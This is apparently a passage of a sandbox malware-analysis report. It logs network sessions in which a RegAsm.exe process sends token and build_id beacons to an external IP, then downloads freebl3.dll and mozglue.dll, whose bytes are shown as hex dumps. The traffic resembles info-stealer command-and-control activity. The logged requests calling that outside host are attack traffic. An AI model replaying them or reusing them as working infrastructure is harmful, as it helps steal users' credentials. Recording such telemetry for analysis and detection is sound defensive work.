2024-09-26 22:15:55 UTC	829	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 47 44 48 44 48 4a 45 42 47 48 4a 4b 46 49 45 43 42 47 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 36 61 30 62 39 38 33 36 61 65 35 64 30 61 63 65 32 35 39 65 63 63 39 65 64 66 30 36 32 35 37 0d 0a 2d 2d 2d 2d 2d 2d 47 44 48 44 48 4a 45 42 47 48 4a 4b 46 49 45 43 42 47 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 39 30 38 34 30 61 38 34 36 64 30 31 37 65 37 62 30 39 35 66 37 35 34 33 63 64 66 32 64 31 35 0d 0a 2d 2d 2d 2d 2d 2d 47 44 48 44 48 4a 45 42 47 48 4a 4b 46 49 45 43 42 47 43 42 0d 0a 43 6f 6e 74 Data Ascii: ------GDHDHJEBGHJKFIECBGCBContent-Disposition: form-data; name="token"66a0b9836ae5d0ace259ecc9edf06257------GDHDHJEBGHJKFIECBGCBContent-Disposition: form-data; name="build_id"e90840a846d017e7b095f7543cdf2d15------GDHDHJEBGHJKFIECBGCBCont
2024-09-26 22:15:55 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 22:15:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-26 22:15:55 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.5	49740	5.75.211.162	443	528	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 22:15:55 UTC	277	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----JKKECBGIIIEBGCBGIDHD User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Content-Length: 437 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 22:15:55 UTC	437	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4a 4b 4b 45 43 42 47 49 49 49 45 42 47 43 42 47 49 44 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 36 61 30 62 39 38 33 36 61 65 35 64 30 61 63 65 32 35 39 65 63 63 39 65 64 66 30 36 32 35 37 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 4b 45 43 42 47 49 49 49 45 42 47 43 42 47 49 44 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 39 30 38 34 30 61 38 34 36 64 30 31 37 65 37 62 30 39 35 66 37 35 34 33 63 64 66 32 64 31 35 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 4b 45 43 42 47 49 49 49 45 42 47 43 42 47 49 44 48 44 0d 0a 43 6f 6e 74 Data Ascii: ------JKKECBGIIIEBGCBGIDHDContent-Disposition: form-data; name="token"66a0b9836ae5d0ace259ecc9edf06257------JKKECBGIIIEBGCBGIDHDContent-Disposition: form-data; name="build_id"e90840a846d017e7b095f7543cdf2d15------JKKECBGIIIEBGCBGIDHDCont
2024-09-26 22:15:56 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 22:15:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-26 22:15:56 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.5	49742	5.75.211.162	443	528	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 22:15:57 UTC	277	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----GIEHJKEBAAEBGCAAEBFH User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Content-Length: 437 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 22:15:57 UTC	437	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 47 49 45 48 4a 4b 45 42 41 41 45 42 47 43 41 41 45 42 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 36 61 30 62 39 38 33 36 61 65 35 64 30 61 63 65 32 35 39 65 63 63 39 65 64 66 30 36 32 35 37 0d 0a 2d 2d 2d 2d 2d 2d 47 49 45 48 4a 4b 45 42 41 41 45 42 47 43 41 41 45 42 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 39 30 38 34 30 61 38 34 36 64 30 31 37 65 37 62 30 39 35 66 37 35 34 33 63 64 66 32 64 31 35 0d 0a 2d 2d 2d 2d 2d 2d 47 49 45 48 4a 4b 45 42 41 41 45 42 47 43 41 41 45 42 46 48 0d 0a 43 6f 6e 74 Data Ascii: ------GIEHJKEBAAEBGCAAEBFHContent-Disposition: form-data; name="token"66a0b9836ae5d0ace259ecc9edf06257------GIEHJKEBAAEBGCAAEBFHContent-Disposition: form-data; name="build_id"e90840a846d017e7b095f7543cdf2d15------GIEHJKEBAAEBGCAAEBFHCont
2024-09-26 22:15:57 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 22:15:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-26 22:15:57 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.5	49743	5.75.211.162	443	528	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 22:15:58 UTC	196	OUT	GET /freebl3.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 22:15:58 UTC	262	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 22:15:58 GMT Content-Type: application/octet-stream Content-Length: 685392 Connection: close Last-Modified: Thursday, 26-Sep-2024 22:15:58 GMT Cache-Control: no-store, no-cache Accept-Ranges: bytes
2024-09-26 22:15:58 UTC	16122	IN	Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!4p@AHS
2024-09-26 22:15:58 UTC	16384	IN	Data Raw: ff ff ff 13 bd 10 ff ff ff 01 c8 89 45 b4 11 df 89 7d c8 89 f2 31 fa 8b 4d 98 31 c1 89 ce 0f a4 d6 10 89 b5 58 ff ff ff 0f ac d1 10 89 4d 98 8b 7d ec 01 cf 89 7d ec 8b 55 e0 11 f2 89 55 e0 31 d3 8b 4d 8c 31 f9 89 da 0f a4 ca 01 89 55 88 0f a4 d9 01 89 4d 8c 8b 5d d4 03 9d 20 ff ff ff 8b 45 cc 13 85 48 ff ff ff 03 5d 94 13 45 9c 89 45 cc 8b bd 7c ff ff ff 31 c7 8b 45 a8 31 d8 89 45 a8 8b 4d c4 01 f9 89 4d c4 8b 75 bc 11 c6 89 75 bc 8b 55 94 31 ca 8b 4d 9c 31 f1 89 d0 0f a4 c8 08 0f a4 d1 08 89 4d 9c 03 9d 04 ff ff ff 8b 75 cc 13 b5 08 ff ff ff 01 cb 89 5d d4 11 c6 89 75 cc 8b 4d a8 31 f1 31 df 89 fa 0f a4 ca 10 89 55 94 0f ac cf 10 89 bd 7c ff ff ff 8b 75 c4 01 fe 89 75 c4 8b 4d bc 11 d1 89 4d bc 31 c8 8b 5d 9c 31 f3 89 c1 0f a4 d9 01 89 8d 78 ff ff ff 0f Data Ascii: E}1M1XM}}UU1M1UM] EH]EE\|1E1EMMuuU1M1Mu]uM11U\|uuMM1]1x
2024-09-26 22:15:58 UTC	16384	IN	Data Raw: c1 c2 08 89 88 90 00 00 00 31 d6 89 b0 9c 00 00 00 89 90 98 00 00 00 8b 4d e8 89 fa 31 ca c1 c2 08 31 d1 89 d6 89 88 a4 00 00 00 8b 4d d8 8b 55 d4 31 ca c1 c2 08 89 b0 a0 00 00 00 31 d1 89 88 ac 00 00 00 89 90 a8 00 00 00 8b 4d c0 8b 55 c4 31 d1 c1 c1 08 31 ca 89 90 b4 00 00 00 8b 95 54 ff ff ff 8b 75 bc 31 d6 c1 c6 08 89 88 b0 00 00 00 31 f2 89 90 bc 00 00 00 89 b0 b8 00 00 00 81 c4 d8 00 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 81 ec 00 01 00 00 89 95 78 ff ff ff 89 cf ff 31 e8 a2 90 07 00 83 c4 04 89 45 bc ff 77 04 e8 94 90 07 00 83 c4 04 89 45 b8 ff 77 08 e8 86 90 07 00 83 c4 04 89 45 c0 ff 77 0c e8 78 90 07 00 83 c4 04 89 45 dc ff 77 10 e8 6a 90 07 00 83 c4 04 89 c6 ff 77 14 e8 5d 90 07 00 83 c4 04 89 c3 ff 77 18 e8 Data Ascii: 1M11MU11MU11Tu11^_[]USWVx1EwEwEwxEwjw]w
2024-09-26 22:15:58 UTC	16384	IN	Data Raw: 7d 08 83 c4 0c 8a 87 18 01 00 00 30 03 8a 87 19 01 00 00 30 43 01 8a 87 1a 01 00 00 30 43 02 8a 87 1b 01 00 00 30 43 03 8a 87 1c 01 00 00 30 43 04 8a 87 1d 01 00 00 30 43 05 8a 87 1e 01 00 00 30 43 06 8a 87 1f 01 00 00 30 43 07 8a 87 20 01 00 00 30 43 08 8a 87 21 01 00 00 30 43 09 8a 87 22 01 00 00 30 43 0a 8a 87 23 01 00 00 30 43 0b 8a 87 24 01 00 00 30 43 0c 8a 87 25 01 00 00 30 43 0d 8a 87 26 01 00 00 30 43 0e 8a 87 27 01 00 00 30 43 0f 0f 10 45 e0 0f 11 87 18 01 00 00 8b 4d f0 31 e9 e8 ad 4e 07 00 31 c0 83 c4 1c 5e 5f 5b 5d c3 cc cc cc 55 89 e5 68 28 01 00 00 e8 42 50 07 00 83 c4 04 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 ec 24 8b 4d 0c a1 b4 30 0a 10 31 e8 89 45 f0 85 c9 74 50 8b 45 10 8d 50 f0 83 fa 10 77 45 be 01 01 01 Data Ascii: }00C0C0C0C0C0C0C 0C!0C"0C#0C$0C%0C&0C'0CEM1N1^_[]Uh(BP]USWV$M01EtPEPwE
2024-09-26 22:15:58 UTC	16384	IN	Data Raw: 0e 81 e6 fc 03 00 00 33 8e 70 3b 08 10 8b 75 e0 89 5e 1c c1 e8 18 33 0c 85 70 3f 08 10 89 56 20 8b 45 f0 8b 5d ec 29 d8 05 33 37 ef c6 0f b6 d4 8b 14 95 70 37 08 10 0f b6 f0 33 14 b5 70 33 08 10 89 c6 c1 ee 0e 81 e6 fc 03 00 00 33 96 70 3b 08 10 8b 75 e0 89 7e 24 c1 e8 18 33 14 85 70 3f 08 10 89 4e 28 89 56 2c 8b 45 e8 89 c7 0f a4 df 08 0f a4 c3 08 89 5d ec 8b 45 e4 01 f8 05 99 91 21 72 0f b6 cc 8b 0c 8d 70 37 08 10 0f b6 d0 33 0c 95 70 33 08 10 89 c2 c1 ea 0e 81 e2 fc 03 00 00 33 8a 70 3b 08 10 c1 e8 18 33 0c 85 70 3f 08 10 89 4e 30 8b 75 f0 89 f1 29 d9 81 c1 67 6e de 8d 0f b6 c5 8b 04 85 70 37 08 10 0f b6 d1 33 04 95 70 33 08 10 89 ca c1 ea 0e 81 e2 fc 03 00 00 33 82 70 3b 08 10 c1 e9 18 33 04 8d 70 3f 08 10 89 f1 8b 55 e4 0f a4 d6 18 89 75 e8 0f ac d1 Data Ascii: 3p;u^3p?V E])37p73p33p;u~$3p?N(V,E]E!rp73p33p;3p?N0u)gnp73p33p;3p?Uu
2024-09-26 22:15:58 UTC	16384	IN	Data Raw: 00 00 c7 45 bc 00 00 00 00 8d 45 e0 50 e8 04 5a 04 00 83 c4 04 85 c0 89 7d a8 0f 88 d4 01 00 00 8d 45 d0 50 e8 ed 59 04 00 83 c4 04 85 c0 0f 88 c0 01 00 00 8d 45 c0 50 e8 d9 59 04 00 83 c4 04 85 c0 0f 88 ac 01 00 00 8d 45 b0 50 e8 c5 59 04 00 83 c4 04 89 c3 85 c0 0f 88 98 01 00 00 8d 46 04 8b 4d ac 83 c1 04 50 51 57 e8 ae d0 06 00 83 c4 0c 89 c7 85 c0 0f 85 7c 01 00 00 8b 45 ac ff 70 0c ff 70 08 8d 45 c0 50 e8 48 d7 04 00 83 c4 0c 89 c3 85 c0 0f 88 5b 01 00 00 8d 46 10 8b 4d ac 83 c1 10 50 51 ff 75 a8 e8 6f d0 06 00 83 c4 0c 89 c7 85 c0 0f 85 3d 01 00 00 8b 45 ac ff 70 18 ff 70 14 8d 45 e0 50 e8 09 d7 04 00 83 c4 0c 89 c3 85 c0 0f 88 1c 01 00 00 8b 4e 0c b8 40 00 00 00 81 f9 7f 07 00 00 77 2c b8 30 00 00 00 81 f9 bf 03 00 00 77 1f b8 20 00 00 00 81 f9 7f Data Ascii: EEPZ}EPYEPYEPYFMPQW\|EppEPH[FMPQuo=EppEPN@w,0w
2024-09-26 22:15:58 UTC	16384	IN	Data Raw: 04 8d 44 24 70 50 e8 5b 1c 04 00 83 c4 04 8d 44 24 60 50 e8 4e 1c 04 00 83 c4 04 8d 44 24 50 50 e8 41 1c 04 00 83 c4 04 8d 44 24 40 50 e8 34 1c 04 00 83 c4 04 8d 44 24 30 50 e8 27 1c 04 00 83 c4 04 8d 44 24 20 50 e8 1a 1c 04 00 83 c4 04 83 c6 04 83 fe 04 77 1a b8 13 e0 ff ff ff 24 b5 74 55 08 10 b8 05 e0 ff ff eb 0c b8 02 e0 ff ff eb 05 b8 01 e0 ff ff 50 e8 7d 90 06 00 83 c4 04 e9 75 fb ff ff cc cc 55 89 e5 53 57 56 81 ec ac 00 00 00 89 cb 8b 4d 0c a1 b4 30 0a 10 31 e8 89 45 f0 8b 73 08 83 c6 07 c1 ee 03 85 c9 74 1b 8b 41 04 80 38 04 0f 85 c2 01 00 00 8d 04 36 83 c0 01 39 41 08 0f 85 b3 01 00 00 89 95 48 ff ff ff c7 45 ec 00 00 00 00 c7 45 dc 00 00 00 00 c7 45 cc 00 00 00 00 c7 45 bc 00 00 00 00 c7 45 ac 00 00 00 00 c7 45 9c 00 00 00 00 c7 45 8c 00 00 00 Data Ascii: D$pP[D$`PND$PPAD$@P4D$0P'D$ Pw$tUP}uUSWVM01EstA869AHEEEEEEE
2024-09-26 22:15:58 UTC	16384	IN	Data Raw: 7d 88 89 f8 f7 65 c8 89 55 84 89 85 0c fd ff ff 89 f8 f7 65 c4 89 95 4c fd ff ff 89 85 58 fd ff ff 89 f8 f7 65 d4 89 95 ac fd ff ff 89 85 b4 fd ff ff 89 f8 f7 65 d8 89 95 30 fe ff ff 89 85 40 fe ff ff 89 f8 f7 65 e4 89 95 a0 fe ff ff 89 85 a4 fe ff ff 89 f8 f7 65 e0 89 95 c4 fe ff ff 89 85 cc fe ff ff 89 f8 f7 65 dc 89 95 ec fe ff ff 89 85 f0 fe ff ff 89 d8 f7 e7 89 95 10 ff ff ff 89 85 18 ff ff ff 8b 75 94 89 f0 f7 65 9c 89 85 30 fd ff ff 89 55 88 8b 45 c8 8d 14 00 89 f0 f7 e2 89 95 90 fd ff ff 89 85 98 fd ff ff 89 f0 f7 65 c4 89 95 f0 fd ff ff 89 85 f8 fd ff ff 89 f0 f7 65 90 89 55 90 89 85 9c fe ff ff 89 f0 f7 65 d8 89 95 b8 fe ff ff 89 85 bc fe ff ff 89 f0 f7 65 ec 89 95 e4 fe ff ff 89 85 e8 fe ff ff 89 f0 f7 65 e0 89 95 20 ff ff ff 89 85 24 ff ff ff Data Ascii: }eUeLXee0@eeeue0UEeeUeee $
2024-09-26 22:15:58 UTC	16384	IN	Data Raw: 38 8b 4f 34 89 4d e4 8b 4f 30 89 4d d4 8b 4f 2c 89 4d bc 8b 4f 28 89 4d a8 89 75 c8 89 45 d8 8b 47 24 89 45 c0 8b 77 20 89 75 ac 8b 4f 08 89 4d e0 89 f8 89 7d ec 8b 5d a8 01 d9 8b 3f 01 f7 89 7d cc 8b 70 04 13 75 c0 89 75 b8 83 d1 00 89 4d d0 0f 92 45 b4 8b 70 0c 8b 55 bc 01 d6 8b 48 10 8b 45 d4 11 c1 0f 92 45 90 01 d6 11 c1 0f 92 45 e8 01 c6 89 45 d4 13 4d e4 0f 92 45 f0 01 5d e0 0f b6 7d b4 8d 04 06 11 c7 0f 92 45 b4 8b 45 c0 01 45 cc 11 5d b8 8b 45 bc 8b 55 d0 8d 1c 02 83 d3 00 89 5d e0 0f 92 c3 01 c2 0f b6 db 8b 45 e4 8d 14 07 11 d3 89 5d d0 0f 92 c2 03 75 d4 0f b6 45 b4 8b 5d e4 8d 34 19 11 f0 89 45 9c 0f 92 45 a4 01 df 0f b6 d2 8b 75 c8 8d 34 30 11 f2 0f 92 45 df 80 45 90 ff 8b 75 ec 8b 46 14 89 45 94 8d 04 03 89 df 83 d0 00 89 45 b4 0f 92 45 98 80 Data Ascii: 8O4MO0MO,MO(MuEG$Ew uOM}]?}puuMEpUHEEEEME]}EEE]EU]E]uE]4EEu40EEuFEEE
2024-09-26 22:15:58 UTC	16384	IN	Data Raw: 1c c1 ee 1a 01 c2 89 95 08 ff ff ff 8b bd 2c ff ff ff 89 f8 81 e7 ff ff ff 01 8d 0c fe 89 d6 c1 ee 1d 01 f1 89 8d 04 ff ff ff c1 e8 19 8b bd 30 ff ff ff 89 fe 81 e7 ff ff ff 03 8d 3c f8 89 c8 c1 e8 1c 01 c7 c1 ee 1a 8b 9d 34 ff ff ff 89 d8 81 e3 ff ff ff 01 8d 1c de 89 fe c1 ee 1d 01 f3 c1 e8 19 8b b5 38 ff ff ff 89 f1 81 e6 ff ff ff 03 8d 04 f0 89 de c1 ee 1c 01 f0 89 c6 25 ff ff ff 1f 89 85 38 ff ff ff c1 e9 1a c1 ee 1d 8d 04 0e 01 f1 83 c1 ff 89 8d 14 ff ff ff 8b 8d 0c ff ff ff c1 e1 03 81 e1 f8 ff ff 1f 8d 0c 41 89 8d 18 ff ff ff 8b b5 10 ff ff ff 81 e6 ff ff ff 0f 89 c1 c1 e1 0b 29 ce 8b 8d 14 ff ff ff c1 e9 1f 89 8d 14 ff ff ff 83 c1 ff 89 ca 81 e2 00 00 00 10 01 d6 89 b5 24 ff ff ff 8b b5 08 ff ff ff 81 e6 ff ff ff 1f 89 ca 81 e2 ff ff ff 1f 01 d6 Data Ascii: ,0<48%8A)$

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.5	49744	5.75.211.162	443	528	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 22:15:59 UTC	196	OUT	GET /mozglue.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 22:16:00 UTC	262	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 22:16:00 GMT Content-Type: application/octet-stream Content-Length: 608080 Connection: close Last-Modified: Thursday, 26-Sep-2024 22:16:00 GMT Cache-Control: no-store, no-cache Accept-Ranges: bytes
2024-09-26 22:16:00 UTC	16122	IN	Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!^j@A`W,
2024-09-26 22:16:00 UTC	16384	IN	Data Raw: c4 04 89 c1 83 c0 23 83 e0 e0 89 48 fc e9 31 ff ff ff 8d 41 24 50 e8 fb 7e 01 00 83 c4 04 89 c1 83 c0 23 83 e0 e0 89 48 fc e9 62 ff ff ff 8d 41 24 50 e8 df 7e 01 00 83 c4 04 89 c1 83 c0 23 83 e0 e0 89 48 fc eb 92 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 56 8b 75 0c 8b 8e b0 00 00 00 83 f9 10 0f 83 e4 00 00 00 c7 86 ac 00 00 00 00 00 00 00 c7 86 b0 00 00 00 0f 00 00 00 c6 86 9c 00 00 00 00 8b 8e 98 00 00 00 83 f9 10 0f 83 e0 00 00 00 c7 86 94 00 00 00 00 00 00 00 c7 86 98 00 00 00 0f 00 00 00 c6 86 84 00 00 00 00 8b 8e 80 00 00 00 83 f9 10 0f 83 dc 00 00 00 c7 46 7c 00 00 00 00 c7 86 80 00 00 00 0f 00 00 00 c6 46 6c 00 8b 4e 68 83 f9 10 0f 83 de 00 00 00 c7 46 64 00 00 00 00 c7 46 68 0f 00 00 00 c6 46 54 00 8b 4e 50 83 f9 10 0f 83 e3 00 00 00 Data Ascii: #H1A$P~#HbA$P~#HUVuF\|FlNhFdFhFTNP
2024-09-26 22:16:00 UTC	16384	IN	Data Raw: ff 8b 45 a8 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 bd 05 00 00 50 e8 7a d3 01 00 83 c4 04 e9 e1 f9 ff ff 8b 45 90 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 b4 05 00 00 50 e8 57 d3 01 00 83 c4 04 e9 dc f9 ff ff 8b 85 78 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 a8 05 00 00 50 e8 31 d3 01 00 83 c4 04 e9 d4 f9 ff ff 8b 85 60 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 9c 05 00 00 50 e8 0b d3 01 00 83 c4 04 e9 d2 f9 ff ff 8b 85 48 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 90 05 00 00 50 e8 e5 d2 01 00 83 c4 04 e9 d6 f9 ff ff 8b b5 24 ff ff ff 89 0e 8b 85 2c ff ff ff 89 46 04 8b 4d f0 31 e9 e8 52 27 03 00 89 f0 81 c4 d0 00 00 00 5e 5f 5b 5d c3 89 f1 89 fa ff b5 30 ff ff ff e9 30 f4 ff ff 89 f1 81 c6 4c ff ff ff 39 c8 74 63 8d 8d 3c Data Ascii: EPzEPWxP1`PHP$,FM1R'^_[]00L9tc<
2024-09-26 22:16:00 UTC	16384	IN	Data Raw: 06 89 c8 ba cd cc cc cc f7 e2 c1 ea 02 83 e2 fe 8d 04 92 29 c1 80 c9 30 8b 06 88 4c 18 03 b9 59 17 b7 d1 89 f8 f7 e1 89 d1 c1 e9 0d 89 c8 ba cd cc cc cc f7 e2 c1 ea 02 83 e2 fe 8d 04 92 29 c1 80 c9 30 8b 06 88 4c 18 02 89 f8 c1 e8 05 b9 c5 5a 7c 0a f7 e1 89 d1 c1 e9 07 bb ff 00 00 00 89 c8 21 d8 69 c0 cd 00 00 00 c1 e8 0a 83 e0 fe 8d 04 80 28 c1 80 c9 30 ba 83 de 1b 43 89 f8 f7 e2 8b 06 8b 7d 08 88 4c 38 01 c1 ea 12 89 d0 21 d8 69 c0 cd 00 00 00 c1 e8 0a 83 e0 fe 8d 04 80 28 c2 80 ca 30 89 f1 8b 06 8b 75 08 88 14 06 8b 39 8d 47 07 89 01 83 c7 0d b9 cd cc cc cc 8b 75 ec 89 f0 f7 e1 89 d1 c1 e9 03 8d 04 09 8d 04 80 89 f3 29 c3 80 cb 30 89 c8 ba cd cc cc cc f7 e2 8b 45 08 88 1c 38 89 c3 c1 ea 02 83 e2 fe 8d 04 92 29 c1 80 c9 30 8b 7d 0c 8b 07 88 4c 18 05 b9 Data Ascii: )0LY)0LZ\|!i(0C}L8!i(0u9Gu)0E8)0}L
2024-09-26 22:16:00 UTC	16384	IN	Data Raw: 83 c4 04 89 45 f0 8b 06 8b 4e 04 85 c9 0f 8e b3 00 00 00 31 c9 8d 14 08 83 c2 0c f2 0f 10 42 f4 8b 5d f0 f2 0f 11 04 0b 8b 7a fc c7 42 fc 00 00 00 00 89 7c 0b 08 8b 1e 8b 7e 04 8d 3c 7f 8d 3c bb 83 c1 0c 39 fa 72 cd e9 81 00 00 00 8b 06 8d 0c 49 8d 0c 88 89 4d f0 31 d2 8d 1c 10 83 c3 0c f2 0f 10 43 f4 f2 0f 11 04 17 8b 4b fc c7 43 fc 00 00 00 00 89 4c 17 08 83 c2 0c 3b 5d f0 72 da 8b 46 04 85 c0 0f 8e 02 ff ff ff 8b 1e 8d 04 40 8d 04 83 89 45 f0 8b 43 08 c7 43 08 00 00 00 00 85 c0 74 09 50 e8 ec 52 01 00 83 c4 04 83 c3 0c 3b 5d f0 0f 83 d4 fe ff ff eb db 31 c0 40 89 45 ec e9 27 ff ff ff 8d 0c 49 8d 3c 88 89 c3 39 fb 73 20 8b 43 08 c7 43 08 00 00 00 00 85 c0 74 09 50 e8 b0 52 01 00 83 c4 04 83 c3 0c 39 fb 72 e2 8b 1e 53 e8 9e 52 01 00 83 c4 04 8b 45 f0 89 Data Ascii: EN1B]zB\|~<<9rIM1CKCL;]rF@ECCtPR;]1@E'I<9s CCtPR9rSRE
2024-09-26 22:16:00 UTC	16384	IN	Data Raw: 42 fd ff ff 8b 48 fc 83 c0 fc 29 c8 83 f8 20 73 1b 89 c8 e9 b3 fe ff ff 8b 48 fc 83 c0 fc 29 c8 83 f8 20 73 07 89 c8 e9 c2 fe ff ff ff 15 b0 bf 08 10 cc cc cc cc 55 89 e5 57 56 89 ce 8b 79 20 85 ff 74 28 f0 ff 4f 38 75 22 8b 4f 14 83 f9 10 73 5f c7 47 10 00 00 00 00 c7 47 14 0f 00 00 00 c6 07 00 57 e8 2d 13 01 00 83 c4 04 8b 7e 18 c7 46 18 00 00 00 00 85 ff 74 1c 8b 07 85 c0 74 0d 50 ff 15 04 be 08 10 c7 07 00 00 00 00 57 e8 03 13 01 00 83 c4 04 8b 46 08 85 c0 75 2f 8b 46 04 85 c0 74 09 50 e8 ec 12 01 00 83 c4 04 5e 5f 5d c3 8b 07 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 76 20 50 e8 cf 12 01 00 83 c4 04 eb 86 c7 05 f4 f8 08 10 1a 2b 08 10 cc b9 18 00 